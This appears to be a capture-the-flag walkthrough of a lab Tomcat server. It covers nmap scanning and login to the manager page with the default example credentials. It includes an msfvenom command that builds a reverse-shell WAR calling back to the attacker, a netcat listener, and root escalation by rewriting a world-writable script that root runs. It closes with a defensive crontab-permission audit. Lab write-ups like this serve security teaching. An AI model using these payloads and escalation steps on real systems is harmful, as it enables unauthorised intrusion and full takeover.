![[Pasted image 20250621214127.png]]

---

# Port scanning - Nmap

Started off with a TCP SYN scan against all 65,535 ports.

```bash
root@ip-10-10-185-64:~# sudo nmap -sS 10.10.10.115 -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-22 02:49 BST
Nmap scan report for 10.10.10.115
Host is up (0.00042s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
8009/tcp open  ajp13
8080/tcp open  http-proxy
MAC Address: 02:DB:5B:2E:6E:13 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
```

Then a script and version scan against the three open ports found: 22, 8009, and 8080.

```bash
root@ip-10-10-185-64:~# nmap -sC -sV 10.10.10.115 -p 22,8009,8080
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-22 02:50 BST
Nmap scan report for 10.10.10.115
Host is up (0.00018s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
|   256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_  256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http    Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/8.5.5
MAC Address: 02:DB:5B:2E:6E:13 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.39 seconds
```

And lastly, a UDP scan against the top 1,000 ports.

```bash
root@ip-10-10-185-64:~# nmap -sU 10.10.10.115 --min-rate 3000 --top-ports 1000
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-22 02:58 BST
Nmap scan report for 10.10.10.115
Host is up (0.00033s latency).
Not shown: 994 open|filtered ports
PORT      STATE  SERVICE
996/udp   closed vsinet
1645/udp  closed radius
16838/udp closed unknown
17101/udp closed unknown
53838/udp closed unknown
61322/udp closed unknown
MAC Address: 02:DB:5B:2E:6E:13 (Unknown)
```

# Footprinting

Navigating to `10.10.10.115:8080`, I see an Apache Tomcat website. Clicking on `Manager App` prompts me to enter credentials.

![[Pasted image 20250621205935.png]]

Clicking on Cancel takes me to this "401 Unauthorized" page, in which the `tomcat:s3cret` credentials appear as an example.

![[Pasted image 20250621210346.png]]

Successfully logged into `/manager` with them.

![[Pasted image 20250621211325.png]]

Scrolling down a bit, there's a file upload feature which seems to only accept `.war` files.

![[Pasted image 20250621211305.png]]

Made a `.war` reverse shell payload with `msfvenom`.

```bash
root@ip-10-10-185-64:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.185.64 LPORT=1234 -f war -o shell.war
Payload size: 1105 bytes
Final size of war file: 1105 bytes
Saved as: shell.war
```

Uploaded the shell and was able to catch the reverse shell!

```bash
root@ip-10-10-185-64:~# nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.10.115 54468
whoami
tomcat
id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
```

In `/home/jack`, I found the `user.txt` flag!

```bash
tomcat@ubuntu:/home/jack$ cat user.txt
3940...
```

# Privilege Escalation

Apart from `user.txt`, there are also `id.sh` and `test.txt`.

```bash
tomcat@ubuntu:/home/jack$ ls
id.sh  test.txt  user.txt
```

`id.sh` is owned by jack but `test.txt` is owned by root.

```bash
tomcat@ubuntu:/home/jack$ ls -l id.sh && ls -l test.txt
-rwxrwxrwx 1 jack jack 26 Aug 14  2019 id.sh
-rw-r--r-- 1 root root 39 Jun 21 19:29 test.txt
```

`test.txt` simply holds the output of `id.sh`; the actual code resides in `id.sh`. Since `test.txt` is owned by root and contains root's `id` output, something running as root is executing `id.sh`.

```bash
tomcat@ubuntu:/home/jack$ cat id.sh
#!/bin/bash
id > test.txt
```

```bash
tomcat@ubuntu:/home/jack$ cat test.txt
uid=0(root) gid=0(root) groups=0(root)
```

Since `id.sh` is world-writable (`-rwxrwxrwx`), we can modify it from the `tomcat` shell even though jack owns it. I replaced the code so that the contents of `root.txt` would be copied to `test.txt`, which is owned by root.

```bash
tomcat@ubuntu:/home/jack$ cat id.sh
#!/bin/bash
cat /root/root.txt > test.txt
```

My theory worked!

```bash
tomcat@ubuntu:/home/jack$ cat test.txt
d89d...
```
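As an added defensive check (my own code, not part of the original writeup), the Python below audits a crontab for the condition that made this escalation possible: a scheduled script that root executes but that a non-root user can rewrite. It assumes the root-owned `test.txt` is produced by a root cron job running `id.sh` (the writeup never shows the crontab); the crontab text and the file metadata are constructed samples, and on a live host `os.stat` is used instead.

```python
import os
import re
import stat
from types import SimpleNamespace

# Constructed sample crontab: the first entry mirrors the assumed root job behind id.sh.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/1 * * * * /home/jack/id.sh
0 3 * * * /usr/local/bin/backup.sh
"""
# Constructed stat results standing in for os.stat() on a live host.
SAMPLE_STATS = {
    "/home/jack/id.sh": SimpleNamespace(st_mode=0o100777, st_uid=1000, st_gid=1000),
    "/usr/local/bin/backup.sh": SimpleNamespace(st_mode=0o100755, st_uid=0, st_gid=0),
}

def parse_cron_commands(crontab):
    """Return the command field of every non-comment crontab line."""
    cmds = []
    for line in crontab.splitlines():
        fields = line.strip().split(None, 5)  # five time fields + the command
        if len(fields) == 6 and not fields[0].startswith("#"):
            cmds.append(fields[5])
    return cmds

def first_path(command):
    """Pick the first absolute path in a command: the script cron executes."""
    m = re.search(r"(?:^|\s)(/\S+)", command)
    return m.group(1) if m else None

def risky_cron_targets(crontab, stat_fn=os.stat):
    """Flag scheduled scripts a non-root user could rewrite before root runs them."""
    findings = []
    for cmd in parse_cron_commands(crontab):
        path = first_path(cmd)
        if path is None:
            continue
        try:
            st = stat_fn(path)
        except (OSError, KeyError):  # missing file: nothing to assess
            continue
        reasons = []
        if st.st_uid != 0:
            reasons.append(f"owned by uid {st.st_uid}, not root")
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if reasons:
            findings.append((path, reasons))
    return findings
```

Run against a real root crontab (`crontab -l -u root`) with the default `os.stat`, the same function reports every scheduled script whose owner or mode would let a low-privileged account swap in its own commands, which is exactly the fix the box needs: `chown root:root` and `chmod 755` on `id.sh`.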